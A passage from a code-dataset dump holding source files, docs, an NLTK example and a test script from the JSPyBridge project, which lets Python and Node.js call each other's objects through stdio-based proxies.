(Number.isInteger(parseInt(prop))) prop = parseInt(prop)\n next.callstack.push(prop)\n return new Proxy(next, handler) // no $ and not fn call, continue chaining\n },\n apply: (target, self, args) => { // Called for function call\n const final = target.callstack[target.callstack.length - 1]\n let kwargs, timeout\n if (final === 'apply') {\n target.callstack.pop()\n args = [args[0], ...args[1]]\n } else if (final === 'call') {\n target.callstack.pop()\n } else if (final?.endsWith('$')) {\n kwargs = args.pop()\n timeout = kwargs.$timeout\n delete kwargs.$timeout\n target.callstack[target.callstack.length - 1] = final.slice(0, -1)\n } else if (final === 'valueOf') {\n target.callstack.pop()\n const ret = this.value(ffid, [...target.callstack])\n return ret\n } else if (final === 'toString') {\n target.callstack.pop()\n const ret = this.inspect(ffid, [...target.callstack])\n return ret\n }\n const ret = this.call(ffid, target.callstack, args, kwargs, false, timeout)\n target.callstack = [] // Flush callstack to py\n return ret\n },\n set: (target, prop, val) => {\n if (Number.isInteger(parseInt(prop))) prop = parseInt(prop)\n const ret = this.call(ffid, [...target.callstack], [prop, val], {}, true)\n return ret\n }\n }\n // A CustomLogger is just here to allow the user to console.log Python objects\n // since this must be sync, we need to call inspect in Python along with every CALL or GET\n // operation, which does bring some small overhead.\n class CustomLogger extends Function {\n constructor () {\n super()\n this.callstack = []\n }\n\n [util.inspect.custom] () {\n return inspectString || '(Some Python object)'\n }\n }\n return new Proxy(new CustomLogger(), handler)\n }\n}\n\nmodule.exports = { PyBridge }\n" }, { "alpha_fraction": 0.5570513010025024, "alphanum_fraction": 0.5591346025466919, "avg_line_length": 30.515151977539062, "blob_id": 
"474c5d726dafa988b9241045e208a6d675664061", "content_id": "f97a4c0c934ca71c787d824bb2b38b276b866d56", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 6240, "license_type": "permissive", "max_line_length": 97, "num_lines": 198, "path": "/src/pythonia/jsi.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "/**\n * The JavaScript Interface for Python\n */\nconst util = require('util')\n\nconst debug = process.env.DEBUG?.includes('jspybridge') ? console.debug : () => { }\nconst colors = process.env.FORCE_COLOR !== '0'\n\nfunction getType (obj) {\n if (obj?.ffid) return 'py'\n if (typeof obj === 'function') {\n // Some tricks to check if we have a function, class or object\n if (obj.prototype) {\n // SO ... we COULD automatically call new for ES5 functions, but this gets complicated.\n // Since old ES5 classes can be called both with and without new, but with different\n // behavior. By forcing the new operator, we can no longer access ES5 classes variables\n // because of lack of support in proxy.py for functions with variables inside.. So instead\n // just don't call `new` for non-ES6 classes and let the user use the .new() psuedomethod.\n // The below could would check if the prototype has functions in it and assume class if so.\n // const props = Object.getOwnPropertyNames(obj.prototype)\n // if (props.length > 1) return 'class'\n // The below code just checks to see if we have an ES6 class (non-writable)\n const desc = Object.getOwnPropertyDescriptor(obj, 'prototype')\n if (!desc.writable) return 'class'\n }\n\n return 'fn'\n }\n if (typeof obj === 'bigint') return 'big'\n if (typeof obj === 'object') return 'obj'\n if (!isNaN(obj)) return 'num'\n if (typeof obj === 'string') return 'string'\n}\n\nclass JSBridge {\n constructor (ipc, pyi) {\n // This is an ID that increments each time a new object is returned\n // to Python.\n this.ffid = 10000\n this.pyi = pyi\n // This contains a refrence map of FFIDs to JS objects.\n // TODO: figure out gc, maybe weakmaps\n this.m = {\n 0: {\n console,\n require,\n globalThis\n }\n }\n this.ipc = ipc\n this.eventMap = {}\n\n // ipc.on('message', this.onMessage)\n }\n\n addWeakRef (object, ffid) {\n const weak = new WeakRef(object)\n Object.defineProperty(this.m, ffid, {\n get () {\n return weak.deref()\n }\n })\n }\n\n async get (r, ffid, attr) {\n try {\n var v = await this.m[ffid][attr]\n var type = v.ffid ? 
'py' : getType(v)\n } catch (e) {\n return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n\n switch (type) {\n case 'string': return this.ipc.send({ r, key: 'string', val: v })\n case 'big': return this.ipc.send({ r, key: 'big', val: Number(v) })\n case 'num': return this.ipc.send({ r, key: 'num', val: v })\n case 'py': return this.ipc.send({ r, key: 'py', val: v.ffid })\n case 'class':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'class', val: this.ffid })\n case 'fn':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'fn', val: this.ffid })\n case 'obj':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'obj', val: this.ffid })\n default: return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n }\n\n set (r, ffid, attr, [val]) {\n try {\n this.m[ffid][attr] = val\n } catch (e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n this.ipc.send({ r, key: '', val: true })\n }\n\n // Call property with new keyword to construct classes\n init (r, ffid, attr, args) {\n // console.log('init', r, ffid, attr, args)\n this.m[++this.ffid] = attr ? new this.m[ffid][attr](...args) : new this.m[ffid](...args)\n this.ipc.send({ r, key: 'inst', val: this.ffid })\n }\n\n // Call function with async keyword (also works with sync funcs)\n async call (r, ffid, attr, args) {\n try {\n if (attr) {\n var v = await this.m[ffid][attr].apply(this.m[ffid], args) // eslint-disable-line\n } else {\n var v = await this.m[ffid](...args) // eslint-disable-line\n }\n } catch (e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n const type = getType(v)\n // console.log('GetType', type, v)\n switch (type) {\n case 'string': return this.ipc.send({ r, key: 'string', val: v })\n case 'big': return this.ipc.send({ r, key: 'big', val: Number(v) })\n case 'num': return this.ipc.send({ r, key: 'num', val: v })\n case 'py': return this.ipc.send({ r, key: 'py', val: v.ffid })\n case 'class':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'class', val: this.ffid })\n case 'fn':\n // Fix for functions that return functions, use .call() wrapper\n // this.m[++this.ffid] = { call: v }\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'fn', val: this.ffid })\n case 'obj':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'obj', val: this.ffid })\n default: return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n }\n\n // called for debug in JS, print() in python via __str__\n async inspect (r, ffid) {\n const s = util.inspect(await this.m[ffid], { colors })\n this.ipc.send({ r, val: s })\n }\n\n // for __dict__ in python (used in json.dumps)\n async serialize (r, ffid) {\n const v = await this.m[ffid]\n this.ipc.send({ r, val: v.valueOf() })\n }\n\n async keys (r, ffid) {\n const v = await this.m[ffid]\n const keys = Object.getOwnPropertyNames(v)\n this.ipc.send({ r, keys })\n }\n\n free (r, ffid, attr, args) {\n for (const id of args) {\n delete this.m[id]\n }\n }\n\n process (r, args) {\n const parse = input => {\n if (typeof input !== 'object') return\n for (const k in input) {\n const v = input[k]\n if (v && typeof v === 'object') {\n if (v.ffid) {\n const proxy = this.pyi.makePyObject(v.ffid)\n this.m[v.ffid] = proxy\n input[k] = proxy\n } else {\n parse(v)\n }\n } else {\n parse(v)\n }\n }\n }\n parse(args)\n }\n\n async onMessage ({ r, action, p, ffid, key, args }) {\n // console.debug('onMessage!', arguments, r, action)\n try {\n if (p) {\n this.process(r, args)\n }\n await this[action](r, ffid, key, args)\n } catch 
(e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n }\n}\n\nmodule.exports = { JSBridge }\n" }, { "alpha_fraction": 0.5471007823944092, "alphanum_fraction": 0.5501970648765564, "avg_line_length": 37.20071792602539, "blob_id": "c37fecb9374ccf17de08e2a3db9acacc2dd563e3", "content_id": "21d80548c1d8bc7652b0aad44634d0c83e455983", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10658, "license_type": "permissive", "max_line_length": 110, "num_lines": 279, "path": "/src/javascript/proxy.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import time, threading, json, sys, os, traceback\nfrom . import config, json_patch\nfrom .errors import JavaScriptError\n\ndebug = config.debug\n\n# This is the Executor, something that sits in the middle of the Bridge and is the interface for\n# Python to JavaScript. This is also used by the bridge to call Python from Node.js.\nclass Executor:\n def __init__(self, loop):\n self.loop = loop\n loop.pyi.executor = self\n self.queue = loop.queue_request\n self.i = 0\n self.bridge = self.loop.pyi\n\n def ipc(self, action, ffid, attr, args=None):\n self.i += 1\n r = self.i # unique request ts, acts as ID for response\n l = None # the lock\n if action == \"get\": # return obj[prop]\n l = self.queue(r, {\"r\": r, \"action\": \"get\", \"ffid\": ffid, \"key\": attr})\n if action == \"init\": # return new obj[prop]\n l = self.queue(r, {\"r\": r, \"action\": \"init\", \"ffid\": ffid, \"key\": attr, \"args\": args})\n if action == \"inspect\": # return require('util').inspect(obj[prop])\n l = self.queue(r, {\"r\": r, \"action\": \"inspect\", \"ffid\": ffid, \"key\": attr})\n if action == \"serialize\": # return JSON.stringify(obj[prop])\n l = self.queue(r, {\"r\": r, \"action\": \"serialize\", \"ffid\": ffid})\n if action == \"set\":\n l = self.queue(r, {\"r\": r, \"action\": \"set\", \"ffid\": ffid, \"key\": attr, \"args\": args})\n if action == \"keys\":\n l = self.queue(r, {\"r\": r, \"action\": \"keys\", \"ffid\": ffid})\n\n if not l.wait(10):\n if not config.event_thread:\n print(config.dead)\n print(\"Timed out\", action, ffid, attr, repr(config.event_thread))\n raise Exception(f\"Timed out accessing '{attr}'\")\n res, barrier = self.loop.responses[r]\n del self.loop.responses[r]\n barrier.wait()\n if \"error\" in res:\n raise JavaScriptError(attr, res[\"error\"])\n return res\n\n # forceRefs=True means that the non-primitives in the second parameter will not be recursively\n # parsed for references. It's specifcally for eval_js.\n def pcall(self, ffid, action, attr, args, *, timeout=1000, forceRefs=False):\n \"\"\"\n This function does a two-part call to JavaScript. First, a preliminary request is made to JS\n with the function ID, attribute and arguments that Python would like to call. For each of the\n non-primitive objects in the arguments, in the preliminary request we \"request\" an FFID from JS\n which is the authoritative side for FFIDs. Only it may assign them; we must request them. Once\n JS recieves the pcall, it searches the arguments and assigns FFIDs for everything, then returns\n the IDs in a response. We use these IDs to store the non-primitive values into our ref map.\n On the JS side, it creates Proxy classes for each of the requests in the pcall, once they get\n destroyed, a free call is sent to Python where the ref is removed from our ref map to allow for\n normal GC by Python. 
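As an illustrative example (values here are made up), a call like proxy.foo(someObj) first sends a\n packet shaped roughly like {\"r\": 10001, \"action\": \"call\", \"ffid\": 7, \"key\": \"foo\",\n \"args\": [{\"r\": 1, \"ffid\": \"\"}]}, and the JS side replies with the FFID it assigned to each\n \"r\" placeholder. 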
Finally, on the JS side it executes the function call without waiting for\n Python. An init/set operation on a JS object also uses pcall as the semantics are the same.\n \"\"\"\n wanted = {}\n self.ctr = 0\n callRespId, ffidRespId = self.i + 1, self.i + 2\n self.i += 2\n self.expectReply = False\n # p=1 means we expect a reply back, not used at the moment, but\n # in the future as an optimization we could skip the wait if not needed\n packet = {\"r\": callRespId, \"action\": action, \"ffid\": ffid, \"key\": attr, \"args\": args}\n\n def ser(arg):\n if hasattr(arg, \"ffid\"):\n self.ctr += 1\n return {\"ffid\": arg.ffid}\n else:\n # Anything we don't know how to serialize -- exotic or not -- treat it as an object\n self.ctr += 1\n self.expectReply = True\n wanted[self.ctr] = arg\n return {\"r\": self.ctr, \"ffid\": \"\"}\n\n if forceRefs:\n _block, _locals = args\n packet[\"args\"] = [args[0], {}]\n flocals = packet[\"args\"][1]\n for k in _locals:\n v = _locals[k]\n if (\n (type(v) is int)\n or (type(v) is float)\n or (v is None)\n or (v is True)\n or (v is False)\n ):\n flocals[k] = v\n else:\n flocals[k] = ser(v)\n packet[\"p\"] = self.ctr\n payload = json.dumps(packet)\n else:\n payload = json.dumps(packet, default=ser)\n # a bit of a perf hack, but we need to add in the counter after we've already serialized ...\n payload = payload[:-1] + f',\"p\":{self.ctr}}}'\n\n l = self.loop.queue_request(callRespId, payload)\n # We only have to wait for a FFID assignment response if\n # we actually sent any non-primitives, otherwise skip\n if self.expectReply:\n l2 = self.loop.await_response(ffidRespId)\n if not l2.wait(timeout):\n raise Exception(\"Execution timed out\")\n pre, barrier = self.loop.responses[ffidRespId]\n del self.loop.responses[ffidRespId]\n\n if \"error\" in pre:\n raise JavaScriptError(attr, pre[\"error\"])\n\n for requestId in pre[\"val\"]:\n ffid = pre[\"val\"][requestId]\n self.bridge.m[ffid] = wanted[int(requestId)]\n # This logic is just for Event Emitters\n try:\n if hasattr(self.bridge.m[ffid], \"__call__\"):\n setattr(self.bridge.m[ffid], \"iffid\", ffid)\n except Exception:\n pass\n\n barrier.wait()\n\n if not l.wait(timeout):\n if not config.event_thread:\n print(config.dead)\n raise Exception(\n f\"Call to '{attr}' timed out. 
Increase the timeout by setting the `timeout` keyword argument.\"\n )\n res, barrier = self.loop.responses[callRespId]\n del self.loop.responses[callRespId]\n\n barrier.wait()\n\n if \"error\" in res:\n raise JavaScriptError(attr, res[\"error\"])\n return res[\"key\"], res[\"val\"]\n\n def getProp(self, ffid, method):\n resp = self.ipc(\"get\", ffid, method)\n return resp[\"key\"], resp[\"val\"]\n\n def setProp(self, ffid, method, val):\n self.pcall(ffid, \"set\", method, [val])\n return True\n\n def callProp(self, ffid, method, args, *, timeout=None, forceRefs=False):\n resp = self.pcall(ffid, \"call\", method, args, timeout=timeout, forceRefs=forceRefs)\n return resp\n\n def initProp(self, ffid, method, args):\n resp = self.pcall(ffid, \"init\", method, args)\n return resp\n\n def inspect(self, ffid, mode):\n resp = self.ipc(\"inspect\", ffid, mode)\n return resp[\"val\"]\n\n def keys(self, ffid):\n return self.ipc(\"keys\", ffid, \"\")[\"keys\"]\n\n def free(self, ffid):\n self.loop.freeable.append(ffid)\n\n def get(self, ffid):\n return self.bridge.m[ffid]\n\n\nINTERNAL_VARS = [\"ffid\", \"_ix\", \"_exe\", \"_pffid\", \"_pname\", \"_es6\", \"_resolved\", \"_Keys\"]\n\n# \"Proxy\" classes get individually instanciated for every thread and JS object\n# that exists. It interacts with an Executor to communicate.\nclass Proxy(object):\n def __init__(self, exe, ffid, prop_ffid=None, prop_name=\"\", es6=False):\n self.ffid = ffid\n self._exe = exe\n self._ix = 0\n #\n self._pffid = prop_ffid if (prop_ffid != None) else ffid\n self._pname = prop_name\n self._es6 = es6\n self._resolved = {}\n self._Keys = None\n\n def _call(self, method, methodType, val):\n this = self\n\n debug(\"MT\", method, methodType, val)\n if methodType == \"fn\":\n return Proxy(self._exe, val, self.ffid, method)\n if methodType == \"class\":\n return Proxy(self._exe, val, es6=True)\n if methodType == \"obj\":\n return Proxy(self._exe, val)\n if methodType == \"inst\":\n return Proxy(self._exe, val)\n if methodType == \"void\":\n return None\n if methodType == \"py\":\n return self._exe.get(val)\n else:\n return val\n\n def __call__(self, *args, timeout=10, forceRefs=False):\n mT, v = (\n self._exe.initProp(self._pffid, self._pname, args)\n if self._es6\n else self._exe.callProp(\n self._pffid, self._pname, args, timeout=timeout, forceRefs=forceRefs\n )\n )\n if mT == \"fn\":\n return Proxy(self._exe, v)\n return self._call(self._pname, mT, v)\n\n def __getattr__(self, attr):\n # Special handling for new keyword for ES5 classes\n if attr == \"new\":\n return self._call(self._pname if self._pffid == self.ffid else \"\", \"class\", self._pffid)\n methodType, val = self._exe.getProp(self._pffid, attr)\n return self._call(attr, methodType, val)\n\n def __getitem__(self, attr):\n methodType, val = self._exe.getProp(self.ffid, attr)\n return self._call(attr, methodType, val)\n\n def __iter__(self):\n self._ix = 0\n if self.length == None:\n self._Keys = self._exe.keys(self.ffid)\n return self\n\n def __next__(self):\n if self._Keys:\n if self._ix < len(self._Keys):\n result = self._Keys[self._ix]\n self._ix += 1\n return result\n else:\n raise StopIteration\n elif self._ix < self.length:\n result = self[self._ix]\n self._ix += 1\n return result\n else:\n raise StopIteration\n\n def __setattr__(self, name, value):\n if name in INTERNAL_VARS:\n object.__setattr__(self, name, value)\n else:\n return self._exe.setProp(self.ffid, name, value)\n\n def __setitem__(self, name, value):\n return self._exe.setProp(self.ffid, name, 
value)\n\n def __contains__(self, key):\n return True if self[key] is not None else False\n\n def valueOf(self):\n ser = self._exe.ipc(\"serialize\", self.ffid, \"\")\n return ser[\"val\"]\n\n def __str__(self):\n return self._exe.inspect(self.ffid, \"str\")\n\n def __repr__(self):\n return self._exe.inspect(self.ffid, \"repr\")\n\n def __json__(self):\n return {\"ffid\": self.ffid}\n\n def __del__(self):\n self._exe.free(self.ffid)\n" }, { "alpha_fraction": 0.7853692173957825, "alphanum_fraction": 0.7860593795776367, "avg_line_length": 62.043479919433594, "blob_id": "55a2265b4da67f63df05da384d5461e72e7744f4", "content_id": "ab823d52d88a036ae1e00430aafeee3c9ee0bc20", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1449, "license_type": "permissive", "max_line_length": 98, "num_lines": 23, "path": "/docs/internal.md", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "## How it works\n\nThis bridge works through standard input/output pipes; there are no native modules, and the \ncommunication can happen anywhere--either over pipes or network sockets.\n\nFor every property access, there is a communication protocol that allows one side to access\nproperties on the other side, and also to complete function calls. \nNon-primitive values are sent as foreign object reference IDs (FFID). These FFIDs\nexist in a map on both sides of the bridge, and map numeric IDs to an object reference. \n\nOn the opposite side to the one that holds a reference, this FFID is assigned to a Proxy object.\nIn JS, an ES6 Proxy is used, and in Python, the proxy is a normal class with custom `__getattr__` \nand other magic methods. Each proxy property access is mirrored on the other side of the bridge. \n\nProxy objects on both sides of the bridge are GC tracked. In JavaScript, all Python Proxy objects\nare registered to a FinalizationRegistry. In Python, `__del__` is used to track the Proxy object's\ndestruction. When the proxy object is destroyed on one side of the bridge, its reference is removed\nfrom the other side of the bridge. This means you don't have to deal with memory management.\n\n### On the JavaScript side\nThe magic behind this is the usage of Proxy chains, which permits call-stack build-up until\na .then call for property access or a function call is done. Afterwards, the callstack is sent\nand executed in Python.
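\n\nAs a rough sketch of what this looks like from the JavaScript side (the exact wire format\nlives in `pyi.js`), awaiting a chained property access flushes the accumulated callstack as\none request:\n\n```js\nconst np = await python('numpy')\n// Accessing np.pi only extends the Proxy's callstack; the await\n// triggers .then, which sends a single request similar to:\n// { r: <id>, action: 'get', ffid: <module ffid>, key: ['pi'], val: [] }\nconst pi = await np.pi\n```"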
}, { "alpha_fraction": 0.6541889309883118, "alphanum_fraction": 0.6595365405082703, "avg_line_length": 34.0625, "blob_id": "92fbed7711386638dc7b55f5003fd9ed837f43a6", "content_id": "877a7ea957965b58717c8dcd5ff42975987bc408", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1683, "license_type": "permissive", "max_line_length": 104, "num_lines": 48, "path": "/examples/javascript/nltk.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import { python } from 'pythonia'\nimport fs from 'fs'\nconst nltk = await python('nltk')\n\n// ** You can comment this if you already have it.\nawait nltk.download('book')\n\nconst monologue = fs.readFileSync('./shakesphere.txt', 'utf-8')\n\n// First we use NLTK to tokenize, tag and \"chunk\" the words into a tree\nconst sentences = await nltk.sent_tokenize(monologue).then(v => v.valueOf())\nconst tokenized = await Promise.all(sentences.map(sentence => nltk.word_tokenize(sentence)))\nconst tagged = await Promise.all(tokenized.map(tok => nltk.pos_tag(tok)))\nconst chunked = await nltk.ne_chunk_sents$(tagged, { binary: true })\n\n// Some tree traversal logic to extract all the Named Entities (NE)\nasync function extractEntityNames (t) {\n const entityNames = []\n if (await t.label$) {\n const label = await t.label()\n if (label === 'NE') {\n for (const child of await t.valueOf()) {\n entityNames.push(child[0])\n }\n } else {\n for await (const child of t) {\n entityNames.push(...await extractEntityNames(child))\n }\n }\n }\n return entityNames\n}\n\nconst entityNames = []\n\n// Run the function above on each of the chunked trees\nfor await (const tree of chunked) {\n entityNames.push(...await extractEntityNames(tree))\n}\n\n// Compile the frequencies of each word\nconst frequencies = entityNames.reduce((acc, curr) => (acc[curr] ??= 0, acc[curr]++, acc), {})\n// Turn it to an array and list by most common\nconst result = Object.entries(frequencies).map(([k, v]) => [k, v]).sort((a, b) => b[1] - a[1])\n// Log it out, you should get [ [ 'Romeo', 5 ], [ 'Juliet', 2 ], [ 'Deny', 1 ], [ 'Montague', 1 ], ... ]\nconsole.log(result)\n// Exit python\npython.exit()\n" }, { "alpha_fraction": 0.6789558529853821, "alphanum_fraction": 0.6881054639816284, "avg_line_length": 31.04310417175293, "blob_id": "a7ca1bd0a6f0cce4ee27e7f644d315cf77508155", "content_id": "7de2c01d285513c6cfeec9b110e92e991f45efe3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3718, "license_type": "permissive", "max_line_length": 231, "num_lines": 116, "path": "/docs/javascript.md", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "## Iterating\n\n* When you iterate on a Python object, always use `for await` instead of a normal `for-of` loop.\n* You can use `py.enumerate` in JS, which works the same as `enumerate()` in Python\n\n## Evaluating Python in JS\n\nSometimes you need to evalutate Python code in JS, for example when dealing with operator overloading.\nThis is made simple by the bridge through the `py` template function. 
Just wrap a Python or JS reference\nwith a ${} and await the value.\n\nLet's add some matrices ...\n\n```js\nconst np = await python('numpy')\n\nconst A = await np.array(([1,2],[3,4]))\nconst B = await np.array(([2,2],[2,2]))\nconst r = await py`${A} + ${B} + ${np.array(([10,10],[10,10]))}`\n```\n\nNotice we don't need to await when interpolating here; it's done internally.\n\n## PyClass\n\n\nYou can create a Python class in JavaScript by extending PyClass.\n\nClass variables can exist on both the Python and JavaScript side; however, since both sides can access \nvariables with the `this` or `self` variable, it doesn't matter where the variable resides. \nHowever, this can be a performance issue: if you access a variable a lot on one side of the bridge,\nit's better to have the variable on the same side to avoid bridging overhead.\n\n\n#### constructor(superclass: PythonRef = null, superArguments = [], superKwargs = {})\n\n* The constructor should initialize all the JS properties.\n* The constructor is where you specify the Python superclass (if any). You can leave the super() empty or not specify a constructor at all if you don't intend to override anything in Python.\n* Any variables you define here will be defined on the JS side, and exposed to Python.\n* Your constructor is called *before* the Python class is `__init__`'ed.\n\n#### init()\n\n* The init() method in your class is called after the Python superclass (if any) has been init'ed\n* Any variables you define here will exist on the Python side, but you can still access them from JS\n\n#### this\n\n* `this.parent` works like `super.` in normal JS. You can use it to force-call the parent to avoid recursion.\n\ncalc.py\n```py\nimport math\nclass Calc:\n def __init__(self, degrees, integers=False):\n self.degrees = degrees\n self.integers = integers\n\n def add(self, a, b):\n return a + b\n\n def div(self, a, b):\n if self.integers:\n return round(a / b)\n else:\n return a / b\n \n def tan(self, val):\n if self.degrees:\n # We need to round here because floating points are imprecise\n return round(math.tan(math.radians(val)))\n return math.tan(val)\n```\n\ncalc.js\n```js\nimport { python, PyClass } from 'pythonia'\nconst calc = await python('./calc.py')\n\nclass MyCalculator extends PyClass {\n constructor() {\n // The second is an array of positional ... 
}, { "alpha_fraction": 0.609684944152832, "alphanum_fraction": 0.6254375576972961, "avg_line_length": 18.930233001708984, "blob_id": "14fab65074743bb6f3e585354aebeedbd774ab56", "content_id": "0a01db4748918c310a887404a734357126841965", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1714, "license_type": "permissive", "max_line_length": 74, "num_lines": 86, "path": "/test/javascript/test.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import os\nimport time\nfrom javascript import require, console, On, Once, off, once, eval_js\n\nDemoClass = require(\"./test.js\").DemoClass\n\nchalk, fs = require(\"chalk\"), require(\"fs\")\n\nconsole.log(\"Hello\", chalk.red(\"world!\"))\nfs.writeFileSync(\"HelloWorld.txt\", \"hi!\")\n\ndemo = DemoClass(\"blue\", {\"a\": 3}, lambda v: print(\"Should be 3\", v))\ndemo2 = DemoClass.new(\"blue\", {\"a\": 3}, lambda v: print(\"Should be 3\", v))\n\nprint(demo.ok()(1, 2, 3))\nprint(demo.ok().x)\nprint(demo.toString())\nprint(\"Hello \", DemoClass.hello())\n\nconsole.log(demo.other(demo2), demo.array(), demo.array()[\"0\"])\n\n\nfor i in demo.array():\n print(\"i\", i)\n\n\ndef some_method(*args):\n print(\"Callback called with\", args)\n\n\ndemo.callback(some_method)\n\n\n@On(demo, \"increment\")\ndef handler(this, fn, num, obj):\n print(\"Handler caled\", fn, num, obj)\n if num == 7:\n off(demo, \"increment\", handler)\n\n\n@Once(demo, \"increment\")\ndef onceIncrement(this, *args):\n print(\"Hey, I'm only called once !\")\n\n\ndemo.increment()\ntime.sleep(0.5)\n\ndemo.arr[1] = 5\ndemo.obj[1] = 5\ndemo.obj[2] = some_method\nprint(\"Demo array and object\", demo.arr, demo.obj)\n\ntry:\n demo.error()\n print(\"Failed to error\")\n exit(1)\nexcept Exception as e:\n print(\"OK, captured error\")\n\nprint(\"Array\", demo.arr.valueOf())\n\ndemo.wait()\nonce(demo, \"done\")\n\ndemo.x = 3\n\npythonArray = []\npythonObject = {\"var\": 3}\n\n# fmt: off\nprint(eval_js('''\n for (let i = 0; i < 10; i++) {\n await pythonArray.append(i);\n pythonObject[i] = i;\n }\n pythonObject.var = 5;\n const fn = await demo.moreComplex()\n console.log('wrapped fn', await fn()); // Should be 3\n return 2\n'''))\n# fmt: on\n\nprint(\"My var\", pythonObject)\n\nprint(\"OK, we can now exit\")\n" }, { "alpha_fraction": 0.5843386650085449, "alphanum_fraction": 0.5889449715614319, "avg_line_length": 25.201148986816406, "blob_id": "167e5e9978d166c9a3fff421aaa4d099a1472d99", "content_id": "ff1dd6b134251bcda35ccf70e8c1fe4f9e624f0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4559, "license_type": "permissive", "max_line_length": 168, "num_lines": 174, "path": "/src/javascript/connection.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import threading, subprocess, json, time, signal\nimport atexit, os, sys\nfrom . 
import config\nfrom .config import debug\n\n# Special handling for IPython jupyter notebooks\nstdout = sys.stdout\nnotebook = False\nNODE_BIN = getattr(os.environ, \"NODE_BIN\") if hasattr(os.environ, \"NODE_BIN\") else \"node\"\n\n\ndef is_notebook():\n try:\n from IPython import get_ipython\n except Exception:\n return False\n if \"COLAB_GPU\" in os.environ:\n return True\n\n shell = get_ipython().__class__.__name__\n if shell == \"ZMQInteractiveShell\":\n return True\n\n\nif is_notebook():\n notebook = True\n stdout = subprocess.PIPE\n\n\ndef supports_color():\n \"\"\"\n Returns True if the running system's terminal supports color, and False\n otherwise.\n \"\"\"\n plat = sys.platform\n supported_platform = plat != \"Pocket PC\" and (plat == \"win32\" or \"ANSICON\" in os.environ)\n # isatty is not always implemented, #6223.\n is_a_tty = hasattr(sys.stdout, \"isatty\") and sys.stdout.isatty()\n if notebook:\n return True\n return supported_platform and is_a_tty\n\n\nif supports_color():\n os.environ[\"FORCE_COLOR\"] = \"1\"\nelse:\n os.environ[\"FORCE_COLOR\"] = \"0\"\n\n# Currently this uses process standard input & standard error pipes\n# to communicate with JS, but this can be turned to a socket later on\n# ^^ Looks like custom FDs don't work on Windows, so let's keep using STDIO.\n\ndn = os.path.dirname(__file__)\nproc = com_thread = stdout_thread = None\n\n\ndef read_stderr(stderrs):\n ret = []\n for stderr in stderrs:\n inp = stderr.decode(\"utf-8\")\n for line in inp.split(\"\\n\"):\n if not len(line):\n continue\n if not line.startswith('{\"r\"'):\n print(\"[JSE]\", line)\n continue\n try:\n d = json.loads(line)\n debug(\"[js -> py]\", int(time.time() * 1000), line)\n ret.append(d)\n except ValueError as e:\n print(\"[JSE]\", line)\n return ret\n\n\nsendQ = []\n\n# Write a message to a remote socket, in this case it's standard input\n# but it could be a websocket (slower) or other generic pipe.\ndef writeAll(objs):\n for obj in objs:\n if type(obj) == str:\n j = obj + \"\\n\"\n else:\n j = json.dumps(obj) + \"\\n\"\n debug(\"[py -> js]\", int(time.time() * 1000), j)\n if not proc:\n sendQ.append(j.encode())\n continue\n try:\n proc.stdin.write(j.encode())\n proc.stdin.flush()\n except Exception:\n stop()\n break\n\n\nstderr_lines = []\n\n# Reads from the socket, in this case it's standard error. Returns an array\n# of responses from the server.\ndef readAll():\n ret = read_stderr(stderr_lines)\n stderr_lines.clear()\n return ret\n\n\ndef com_io():\n global proc, stdout_thread\n try:\n proc = subprocess.Popen(\n [NODE_BIN, dn + \"/js/bridge.js\"],\n stdin=subprocess.PIPE,\n stdout=stdout,\n stderr=subprocess.PIPE,\n )\n except Exception as e:\n print(\n \"--====--\\t--====--\\n\\nBridge failed to spawn JS process!\\n\\nDo you have Node.js 16 or newer installed? 
Get it at https://nodejs.org/\\n\\n--====--\\t--====--\"\n )\n stop()\n raise e\n\n for send in sendQ:\n proc.stdin.write(send)\n proc.stdin.flush()\n\n if notebook:\n stdout_thread = threading.Thread(target=stdout_read, args=(), daemon=True)\n stdout_thread.start()\n\n while proc.poll() == None:\n stderr_lines.append(proc.stderr.readline())\n config.event_loop.queue.put(\"stdin\")\n stop()\n\n\ndef stdout_read():\n while proc.poll() is None:\n print(proc.stdout.readline().decode(\"utf-8\"))\n\n\ndef start():\n global com_thread\n com_thread = threading.Thread(target=com_io, args=(), daemon=True)\n com_thread.start()\n\n\ndef stop():\n try:\n proc.terminate()\n except Exception:\n pass\n config.event_loop = None\n config.event_thread = None\n config.executor = None\n # The \"root\" interface to JavaScript with FFID 0\n class Null:\n def __getattr__(self, *args, **kwargs):\n raise Exception(\n \"The JavaScript process has crashed. Please restart the runtime to access JS APIs.\"\n )\n\n config.global_jsi = Null()\n # Currently this breaks GC\n config.fast_mode = False\n\n\ndef is_alive():\n return proc.poll() is None\n\n\n# Make sure our child process is killed if the parent one is exiting\natexit.register(stop)\n" }, { "alpha_fraction": 0.5853025913238525, 